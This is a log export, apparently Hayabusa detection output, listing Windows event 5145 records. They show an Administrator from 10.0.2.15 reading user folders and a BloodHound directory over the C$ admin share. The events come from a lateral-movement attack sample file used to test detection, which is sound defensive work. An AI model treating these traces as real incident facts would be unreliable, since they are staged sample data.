+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
